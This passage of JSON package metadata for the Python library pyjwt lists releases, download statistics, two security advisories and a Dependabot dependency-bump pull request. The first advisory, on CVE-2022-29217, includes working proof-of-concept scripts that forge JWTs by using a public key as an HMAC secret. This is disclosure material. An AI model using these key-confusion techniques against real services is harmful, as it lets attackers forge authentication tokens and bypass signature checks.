/tar.gz/0.2.2","html_url":"https://github.com/jpadilla/pyjwt/releases/tag/0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jpadilla%2Fpyjwt/tags/0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jpadilla%2Fpyjwt/tags/0.2.2/manifests"},{"name":"0.2.0","sha":"257fd34acc393520fd01cfcf47bf628835ed9402","kind":"commit","published_at":"2014-03-26T00:02:10.000Z","download_url":"https://codeload.github.com/jpadilla/pyjwt/tar.gz/0.2.0","html_url":"https://github.com/jpadilla/pyjwt/releases/tag/0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jpadilla%2Fpyjwt/tags/0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jpadilla%2Fpyjwt/tags/0.2.0/manifests"},{"name":"0.1.9","sha":"581c660108d9eabe1c061620e6b795064b0b5b8d","kind":"commit","published_at":"2014-02-08T07:12:01.000Z","download_url":"https://codeload.github.com/jpadilla/pyjwt/tar.gz/0.1.9","html_url":"https://github.com/jpadilla/pyjwt/releases/tag/0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jpadilla%2Fpyjwt/tags/0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jpadilla%2Fpyjwt/tags/0.1.9/manifests"},{"name":"0.1.6","sha":"2b5dd54dabe599676f3fa5b4f4c90b59856e908f","kind":"tag","published_at":"2013-08-08T18:35:32.000Z","download_url":"https://codeload.github.com/jpadilla/pyjwt/tar.gz/0.1.6","html_url":"https://github.com/jpadilla/pyjwt/releases/tag/0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jpadilla%2Fpyjwt/tags/0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jpadilla%2Fpyjwt/tags/0.1.6/manifests"}]},"repo_metadata_updated_at":"2025-06-03T00:29:21.723Z","dependent_packages_count":1012,"downloads":206548331,"downloads_period":"last-month","dependent_repos_count":34706,"rankings":{"downloads":0.007153246381649539,"dependent_repos_count":0.03686673135157839,"dependent_packages_count":0.024577820901052257,"stargazers_count":1.4502748497359719,"forks_count":2.2574911914190388,"docker_downloads_count":0.3033710132114958,"average":0.6799558088334644},"purl":"pkg:pypi/pyjwt","advisories":[{"uuid":"GSA_kwCzR0hTQS1mZnFqLTZmcXItOWgyNM4AArBb","url":"https://github.com/advisories/GHSA-ffqj-6fqr-9h24","title":"Key confusion through non-blocklisted public key formats","description":"### Impact\n_What kind of vulnerability is it? Who is impacted?_\n\nDisclosed by Aapo Oksman (Senior Security Specialist, Nixu Corporation).\n\n\u003e PyJWT supports multiple different JWT signing algorithms. With JWT, an \n\u003e attacker submitting the JWT token can choose the used signing algorithm.\n\u003e \n\u003e The PyJWT library requires that the application chooses what algorithms \n\u003e are supported. The application can specify \n\u003e \"jwt.algorithms.get_default_algorithms()\" to get support for all \n\u003e algorithms. They can also specify a single one of them (which is the \n\u003e usual use case if calling jwt.decode directly. However, if calling \n\u003e jwt.decode in a helper function, all algorithms might be enabled.)\n\u003e \n\u003e For example, if the user chooses \"none\" algorithm and the JWT checker \n\u003e supports that, there will be no signature checking. This is a common \n\u003e security issue with some JWT implementations.\n\u003e \n\u003e PyJWT combats this by requiring that the if the \"none\" algorithm is \n\u003e used, the key has to be empty. As the key is given by the application \n\u003e running the checker, attacker cannot force \"none\" cipher to be used.\n\u003e \n\u003e Similarly with HMAC (symmetric) algorithm, PyJWT checks that the key is \n\u003e not a public key meant for asymmetric algorithm i.e. HMAC cannot be used \n\u003e if the key begins with \"ssh-rsa\". If HMAC is used with a public key, the \n\u003e attacker can just use the publicly known public key to sign the token \n\u003e and the checker would use the same key to verify.\n\u003e \n\u003e  From PyJWT 2.0.0 onwards, PyJWT supports ed25519 asymmetric algorithm. \n\u003e With ed25519, PyJWT supports public keys that start with \"ssh-\", for \n\u003e example \"ssh-ed25519\".\n\n```python\nimport jwt\nfrom cryptography.hazmat.primitives import serialization\nfrom cryptography.hazmat.primitives.asymmetric import ed25519\n\n# Generate ed25519 private key\nprivate_key = ed25519.Ed25519PrivateKey.generate()\n\n# Get private key bytes as they would be stored in a file\npriv_key_bytes = \nprivate_key.private_bytes(encoding=serialization.Encoding.PEM,format=serialization.PrivateFormat.PKCS8, \nencryption_algorithm=serialization.NoEncryption())\n\n# Get public key bytes as they would be stored in a file\npub_key_bytes = \nprivate_key.public_key().public_bytes(encoding=serialization.Encoding.OpenSSH,format=serialization.PublicFormat.OpenSSH)\n\n# Making a good jwt token that should work by signing it with the \nprivate key\nencoded_good = jwt.encode({\"test\": 1234}, priv_key_bytes, algorithm=\"EdDSA\")\n\n# Using HMAC with the public key to trick the receiver to think that the \npublic key is a HMAC secret\nencoded_bad = jwt.encode({\"test\": 1234}, pub_key_bytes, algorithm=\"HS256\")\n\n# Both of the jwt tokens are validated as valid\ndecoded_good = jwt.decode(encoded_good, pub_key_bytes, \nalgorithms=jwt.algorithms.get_default_algorithms())\ndecoded_bad = jwt.decode(encoded_bad, pub_key_bytes, \nalgorithms=jwt.algorithms.get_default_algorithms())\n\nif decoded_good == decoded_bad:\n     print(\"POC Successfull\")\n\n# Of course the receiver should specify ed25519 algorithm to be used if \nthey specify ed25519 public key. However, if other algorithms are used, \nthe POC does not work\n# HMAC specifies illegal strings for the HMAC secret in jwt/algorithms.py\n#\n#        invalid_strings = [\n#            b\"-----BEGIN PUBLIC KEY-----\",\n#            b\"-----BEGIN CERTIFICATE-----\",\n#            b\"-----BEGIN RSA PUBLIC KEY-----\",\n#            b\"ssh-rsa\",\n#        ]\n#\n# However, OKPAlgorithm (ed25519) accepts the following in \njwt/algorithms.py:\n#\n#                if \"-----BEGIN PUBLIC\" in str_key:\n#                    return load_pem_public_key(key)\n#                if \"-----BEGIN PRIVATE\" in str_key:\n#                    return load_pem_private_key(key, password=None)\n#                if str_key[0:4] == \"ssh-\":\n#                    return load_ssh_public_key(key)\n#\n# These should most likely made to match each other to prevent this behavior\n```\n\n\n```python\nimport jwt\n\n#openssl ecparam -genkey -name prime256v1 -noout -out ec256-key-priv.pem\n#openssl ec -in ec256-key-priv.pem -pubout \u003e ec256-key-pub.pem\n#ssh-keygen -y -f ec256-key-priv.pem \u003e ec256-key-ssh.pub\n\npriv_key_bytes = b\"\"\"-----BEGIN EC PRIVATE KEY-----\nMHcCAQEEIOWc7RbaNswMtNtc+n6WZDlUblMr2FBPo79fcGXsJlGQoAoGCCqGSM49\nAwEHoUQDQgAElcy2RSSSgn2RA/xCGko79N+7FwoLZr3Z0ij/ENjow2XpUDwwKEKk\nAk3TDXC9U8nipMlGcY7sDpXp2XyhHEM+Rw==\n-----END EC PRIVATE KEY-----\"\"\"\n\npub_key_bytes = b\"\"\"-----BEGIN PUBLIC KEY-----\nMFkwEwYHKoZIzj0CAQYIKoZIzj0DAQcDQgAElcy2RSSSgn2RA/xCGko79N+7FwoL\nZr3Z0ij/ENjow2XpUDwwKEKkAk3TDXC9U8nipMlGcY7sDpXp2XyhHEM+Rw==\n-----END PUBLIC KEY-----\"\"\"\n\nssh_key_bytes = b\"\"\"ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBJXMtkUkkoJ9kQP8QhpKO/TfuxcKC2a92dIo/xDY6MNl6VA8MChCpAJN0w1wvVPJ4qTJRnGO7A6V6dl8oRxDPkc=\"\"\"\n\n# Making a good jwt token that should work by signing it with the private key\nencoded_good = jwt.encode({\"test\": 1234}, priv_key_bytes, algorithm=\"ES256\")\n\n# Using HMAC with the ssh public key to trick the receiver to think that the public key is a HMAC secret\nencoded_bad = jwt.encode({\"test\": 1234}, ssh_key_bytes, algorithm=\"HS256\")\n\n# Both of the jwt tokens are validated as valid\ndecoded_good = jwt.decode(encoded_good, ssh_key_bytes, algorithms=jwt.algorithms.get_default_algorithms())\ndecoded_bad = jwt.decode(encoded_bad, ssh_key_bytes, algorithms=jwt.algorithms.get_default_algorithms())\n\nif decoded_good == decoded_bad:\n    print(\"POC Successfull\")\nelse:\n    print(\"POC Failed\")\n```\n\n\u003e The issue is not that big as \n\u003e algorithms=jwt.algorithms.get_default_algorithms() has to be used. \n\u003e However, with quick googling, this seems to be used in some cases at \n\u003e least in some minor projects.\n\n### Patches\n\nUsers should upgrade to v2.4.0.\n\n### Workarounds\n\nAlways be explicit with the algorithms that are accepted and expected when decoding.\n\n### References\n_Are there any links users can visit to find out more?_\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Open an issue in https://github.com/jpadilla/pyjwt\n* Email José Padilla: pyjwt at jpadilla dot com\n","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2022-05-24T22:17:27.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":0.0,"cvss_vector":null,"references":["https://github.com/jpadilla/pyjwt/security/advisories/GHSA-ffqj-6fqr-9h24","https://nvd.nist.gov/vuln/detail/CVE-2022-29217","https://github.com/jpadilla/pyjwt/commit/9c528670c455b8d948aff95ed50e22940d1ad3fc","https://github.com/jpadilla/pyjwt/releases/tag/2.4.0","https://github.com/pypa/advisory-database/tree/main/vulns/pyjwt/PYSEC-2022-202.yaml","https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5PK7IQCBVNLYJEFTPHBBPFP72H4WUFNX","https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6HIYEYZRQEP6QTHT3EHH3RGFYJIHIMAO","https://github.com/advisories/GHSA-ffqj-6fqr-9h24"],"source_kind":"github","identifiers":["GHSA-ffqj-6fqr-9h24","CVE-2022-29217"],"repository_url":"https://github.com/jpadilla/pyjwt","blast_radius":0.0,"packages":[{"versions":[{"first_patched_version":"2.4.0","vulnerable_version_range":"\u003e= 1.5.0, \u003c 2.4.0"}],"ecosystem":"pypi","package_name":"pyjwt"}],"created_at":"2022-12-21T16:12:23.497Z","updated_at":"2025-04-24T01:12:28.703Z","epss_percentage":0.00415,"epss_percentile":0.60524},{"uuid":"GSA_kwCzR0hTQS1yOWp3LW13aHEtd3A2Ms4AAR9d","url":"https://github.com/advisories/GHSA-r9jw-mwhq-wp62","title":"PyJWT vulnerable to key confusion attacks","description":"In PyJWT 1.5.0 and below the `invalid_strings` check in `HMACAlgorithm.prepare_key` does not account for all PEM encoded public keys. Specifically, the PKCS1 PEM encoded format would be allowed because it is prefaced with the string `-----BEGIN RSA PUBLIC KEY-----` which is not accounted for. This enables symmetric/asymmetric key confusion attacks against users using the PKCS1 PEM encoded public keys, which would allow an attacker to craft JWTs from scratch.","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2022-05-13T01:42:19.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":0.0,"cvss_vector":null,"references":["https://nvd.nist.gov/vuln/detail/CVE-2017-11424","https://github.com/jpadilla/pyjwt/pull/277","http://www.debian.org/security/2017/dsa-3979","https://github.com/pypa/advisory-database/tree/main/vulns/pyjwt/PYSEC-2017-24.yaml","https://github.com/advisories/GHSA-r9jw-mwhq-wp62"],"source_kind":"github","identifiers":["GHSA-r9jw-mwhq-wp62","CVE-2017-11424"],"repository_url":"https://github.com/jpadilla/pyjwt","blast_radius":0.0,"packages":[{"versions":[{"first_patched_version":"1.5.1","vulnerable_version_range":"\u003c 1.5.1"}],"ecosystem":"pypi","package_name":"pyjwt"}],"created_at":"2022-12-21T16:11:59.671Z","updated_at":"2024-10-15T16:34:42.000Z","epss_percentage":0.01296,"epss_percentile":0.78528}],"docker_usage_url":"https://docker.ecosyste.ms/usage/pypi/pyjwt","docker_dependents_count":1544,"docker_downloads_count":734216805,"usage_url":"https://repos.ecosyste.ms/usage/pypi/pyjwt","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/pypi/pyjwt/dependencies","status":null,"funding_links":["https://github.com/sponsors/jpadilla"],"critical":true,"versions_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/packages/pyjwt/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/packages/pyjwt/version_numbers","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/packages/pyjwt/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/packages/pyjwt/related_packages","maintainers":[{"uuid":"jpadilla","login":"jpadilla","name":null,"email":null,"url":null,"packages_count":15,"html_url":"https://pypi.org/user/jpadilla/","role":null,"created_at":"2023-02-04T17:39:50.521Z","updated_at":"2023-02-04T17:39:50.521Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/maintainers/jpadilla/packages"}],"registry":{"name":"pypi.org","url":"https://pypi.org","ecosystem":"pypi","default":true,"packages_count":690057,"maintainers_count":292646,"namespaces_count":0,"keywords_count":228482,"github":"pypi","metadata":{"funded_packages_count":48953},"icon_url":"https://github.com/pypi.png","created_at":"2022-04-04T15:19:23.364Z","updated_at":"2025-06-05T05:19:27.498Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/namespaces"}},"unique_repositories_count":735,"unique_repositories_count_past_30_days":57,"recent_issues":[{"uuid":"4660994181","node_id":"PR_kwDOAUUStM7mU7cd","number":2434,"state":"open","title":"build(deps): bump the dependencies group across 1 directory with 4 updates","user":"dependabot[bot]","labels":["skip-changelog","minor","chore"],"assignees":[],"locked":false,"comments_count":1,"pull_request":true,"closed_at":null,"author_association":null,"state_reason":null,"created_at":"2026-06-14T23:25:36.000Z","updated_at":"2026-06-14T23:25:55.000Z","time_to_close":null,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"build(deps): bump","group_name":"dependencies","update_count":4,"packages":[{"name":"requests","old_version":"2.33.1","new_version":"2.34.2","repository_url":"https://github.com/psf/requests"},{"name":"pyjwt","old_version":"2.12.1","new_version":"2.13.0","repository_url":"https://github.com/jpadilla/pyjwt"},{"name":"pip","old_version":"26.1","new_version":"26.1.2","repository_url":"https://github.com/pypa/pip"},{"name":"pytest","old_version":"9.0.3","new_version":"9.1.0","repository_url":"https://github.com/pytest-dev/pytest"}],"path":null,"ecosystem":"pip"},"body":"Bumps the dependencies group with 4 updates in the / directory: [requests](https://github.com/psf/requests), [pyjwt](https://github.com/jpadilla/pyjwt), [pip](https://github.com/pypa/pip) and [pytest](https://github.com/pytest-dev/pytest).\n\nUpdates `requests` from 2.33.1 to 2.34.2\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/psf/requests/releases\"\u003erequests's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev2.34.2\u003c/h2\u003e\n\u003ch2\u003e2.34.2 (2026-05-14)\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMoved \u003ccode\u003eheaders\u003c/code\u003e input type back to \u003ccode\u003eMapping\u003c/code\u003e to avoid invariance issues with \u003ccode\u003eMutableMapping\u003c/code\u003e and inferred dict types. Users calling \u003ccode\u003eRequest.headers.update()\u003c/code\u003e may need to narrow typing in their code. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7441\"\u003e#7441\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/psf/requests/blob/main/HISTORY.md#2342-2026-05-14\"\u003ehttps://github.com/psf/requests/blob/main/HISTORY.md#2342-2026-05-14\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev2.34.1\u003c/h2\u003e\n\u003ch2\u003e2.34.1 (2026-05-13)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eBugfixes\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eWidened \u003ccode\u003ejson\u003c/code\u003e input type from \u003ccode\u003edict\u003c/code\u003e and \u003ccode\u003elist\u003c/code\u003e to \u003ccode\u003eMapping\u003c/code\u003e\nand \u003ccode\u003eSequence\u003c/code\u003e. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7436\"\u003e#7436\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eChanged \u003ccode\u003eheaders\u003c/code\u003e input type to MutableMapping and removed \u003ccode\u003eNone\u003c/code\u003e from\n\u003ccode\u003eRequest.headers\u003c/code\u003e typing to improve handling for users. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7431\"\u003e#7431\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eResponse.reason\u003c/code\u003e moved from \u003ccode\u003estr | None\u003c/code\u003e to \u003ccode\u003estr\u003c/code\u003e to improve handling\nfor users. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7437\"\u003e#7437\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFixed a bug where some bodies with custom \u003ccode\u003e__getattr__\u003c/code\u003e implementations\nweren't being properly detected as Iterables. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7433\"\u003e#7433\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eNew Contributors\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/k223kim\"\u003e\u003ccode\u003e@​k223kim\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/psf/requests/pull/7433\"\u003epsf/requests#7433\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/psf/requests/blob/main/HISTORY.md#2341-2026-05-13\"\u003ehttps://github.com/psf/requests/blob/main/HISTORY.md#2341-2026-05-13\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev2.34.0\u003c/h2\u003e\n\u003ch2\u003e2.34.0 (2026-05-11)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eAnnouncements\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eRequests 2.34.0 introduces inline types, replacing those provided by\ntypeshed. Public API types should be fully compatible with mypy, pyright,\nand ty. \u003cstrong\u003eWe believe types are comprehensive but if you find issues, please\nreport them to the \u003ca href=\"https://redirect.github.com/psf/requests/issues/7271\"\u003epinned tracking issue\u003c/a\u003e.\u003c/strong\u003e\u003c/p\u003e\n\u003cp\u003eSpecial thanks to \u003ca href=\"https://github.com/bastimeyer\"\u003e\u003ccode\u003e@​bastimeyer\u003c/code\u003e\u003c/a\u003e, \u003ca href=\"https://github.com/cthoyt\"\u003e\u003ccode\u003e@​cthoyt\u003c/code\u003e\u003c/a\u003e, \u003ca href=\"https://github.com/edgarrmondragon\"\u003e\u003ccode\u003e@​edgarrmondragon\u003c/code\u003e\u003c/a\u003e, and \u003ca href=\"https://github.com/srittau\"\u003e\u003ccode\u003e@​srittau\u003c/code\u003e\u003c/a\u003e for\nhelping review and test the types ahead of the release. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7272\"\u003e#7272\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eImprovements\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eDigest Auth hashing algorithms have added \u003ccode\u003eusedforsecurity=False\u003c/code\u003e to clarify\nsecurity considerations. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7310\"\u003e#7310\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eRequests added support for Python 3.15 based on beta1. Downstream projects\nshould be able to start testing prior to its release in October. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7422\"\u003e#7422\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eRequests added support for Python 3.14t. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7419\"\u003e#7419\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eBugfixes\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003eResponse.history\u003c/code\u003e no longer contains a reference to itself, preventing\naccidental looping when traversing the history list. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7328\"\u003e#7328\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eRequests no longer performs greedy matching on no_proxy domains. The\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/psf/requests/blob/main/HISTORY.md\"\u003erequests's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e2.34.2 (2026-05-14)\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMoved \u003ccode\u003eheaders\u003c/code\u003e input type back to \u003ccode\u003eMapping\u003c/code\u003e to avoid invariance issues\nwith \u003ccode\u003eMutableMapping\u003c/code\u003e and inferred dict types. Users calling\n\u003ccode\u003eRequest.headers.update()\u003c/code\u003e may need to narrow typing in their code. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7441\"\u003e#7441\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.34.1 (2026-05-13)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eBugfixes\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eWidened \u003ccode\u003ejson\u003c/code\u003e input type from \u003ccode\u003edict\u003c/code\u003e and \u003ccode\u003elist\u003c/code\u003e to \u003ccode\u003eMapping\u003c/code\u003e\nand \u003ccode\u003eSequence\u003c/code\u003e. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7436\"\u003e#7436\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eChanged \u003ccode\u003eheaders\u003c/code\u003e input type to MutableMapping and removed \u003ccode\u003eNone\u003c/code\u003e from\n\u003ccode\u003eRequest.headers\u003c/code\u003e typing to improve handling for users. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7431\"\u003e#7431\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eResponse.reason\u003c/code\u003e moved from \u003ccode\u003estr | None\u003c/code\u003e to \u003ccode\u003estr\u003c/code\u003e to improve handling\nfor users. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7437\"\u003e#7437\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFixed a bug where some bodies with custom \u003ccode\u003e__getattr__\u003c/code\u003e implementations\nweren't being properly detected as Iterables. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7433\"\u003e#7433\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.34.0 (2026-05-11)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eAnnouncements\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eRequests 2.34.0 introduces inline types, replacing those provided by\ntypeshed. Public API types should be fully compatible with mypy, pyright,\nand ty. We believe types are comprehensive but if you find issues, please\nreport them to the pinned tracking issue.\u003c/p\u003e\n\u003cp\u003eSpecial thanks to \u003ca href=\"https://github.com/bastimeyer\"\u003e\u003ccode\u003e@​bastimeyer\u003c/code\u003e\u003c/a\u003e, \u003ca href=\"https://github.com/cthoyt\"\u003e\u003ccode\u003e@​cthoyt\u003c/code\u003e\u003c/a\u003e, \u003ca href=\"https://github.com/edgarrmondragon\"\u003e\u003ccode\u003e@​edgarrmondragon\u003c/code\u003e\u003c/a\u003e, and \u003ca href=\"https://github.com/srittau\"\u003e\u003ccode\u003e@​srittau\u003c/code\u003e\u003c/a\u003e for\nhelping review and test the types ahead of the release. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7272\"\u003e#7272\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eImprovements\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eDigest Auth hashing algorithms have added \u003ccode\u003eusedforsecurity=False\u003c/code\u003e to clarify\nsecurity considerations. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7310\"\u003e#7310\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eRequests added support for Python 3.15 based on beta1. Downstream projects\nshould be able to start testing prior to its release in October. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7422\"\u003e#7422\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eRequests added support for Python 3.14t. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7419\"\u003e#7419\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eBugfixes\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003eResponse.history\u003c/code\u003e no longer contains a reference to itself, preventing\naccidental looping when traversing the history list. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7328\"\u003e#7328\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eRequests no longer performs greedy matching on no_proxy domains. The\nproxy_bypass implementation has been updated with CPython's fix from\nbpo-39057. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7427\"\u003e#7427\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eRequests no longer incorrectly strips duplicate leading slashes in\nURI paths. This should address user issues with specific presigned\nURLs. Note the full fix requires urllib3 2.7.0+. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7315\"\u003e#7315\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/6e83187b8feb273ed4c6cdab5efd8d54901dfab3\"\u003e\u003ccode\u003e6e83187\u003c/code\u003e\u003c/a\u003e v2.34.2\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/84d10f0be83e8f6aeca8a05230c52216431c4d0b\"\u003e\u003ccode\u003e84d10f0\u003c/code\u003e\u003c/a\u003e Move Request.headers back to Mapping (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7441\"\u003e#7441\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/b7b549b54571d03950b16afd2d01bc6ff0348224\"\u003e\u003ccode\u003eb7b549b\u003c/code\u003e\u003c/a\u003e v2.34.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/e511bc72777a94c45d004e010c597925092e1efe\"\u003e\u003ccode\u003ee511bc7\u003c/code\u003e\u003c/a\u003e Fix mutability issues with headers input types (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7431\"\u003e#7431\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/5691f596134c2feb121e595c77a0178921fcce61\"\u003e\u003ccode\u003e5691f59\u003c/code\u003e\u003c/a\u003e Update JsonType containers to read-based collections (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7436\"\u003e#7436\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/2144213c307691710c9d665700860fc4993c3035\"\u003e\u003ccode\u003e2144213\u003c/code\u003e\u003c/a\u003e Constrain Response.reason to str (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7437\"\u003e#7437\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/6404f345e562d962abe6700a1c357ec1e7e18232\"\u003e\u003ccode\u003e6404f34\u003c/code\u003e\u003c/a\u003e Fix \u003ccode\u003eprepare_body\u003c/code\u003e stream detection for \u003ccode\u003e__getattr__\u003c/code\u003e-based file wrappers (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7\"\u003e#7\u003c/a\u003e...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/0b401c76b6e80a4eecf3c690085b2553f6e261ca\"\u003e\u003ccode\u003e0b401c7\u003c/code\u003e\u003c/a\u003e v2.34.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/86b378d3f60f828daa13ca50aa82e287ff7b66b4\"\u003e\u003ccode\u003e86b378d\u003c/code\u003e\u003c/a\u003e Align Session.get parameters with requests.get (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7429\"\u003e#7429\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/a4f9a5999bdb9bf2d6e7c8aa973b28cacb17134f\"\u003e\u003ccode\u003ea4f9a59\u003c/code\u003e\u003c/a\u003e Port bpo-39057 to Requests (\u003ca 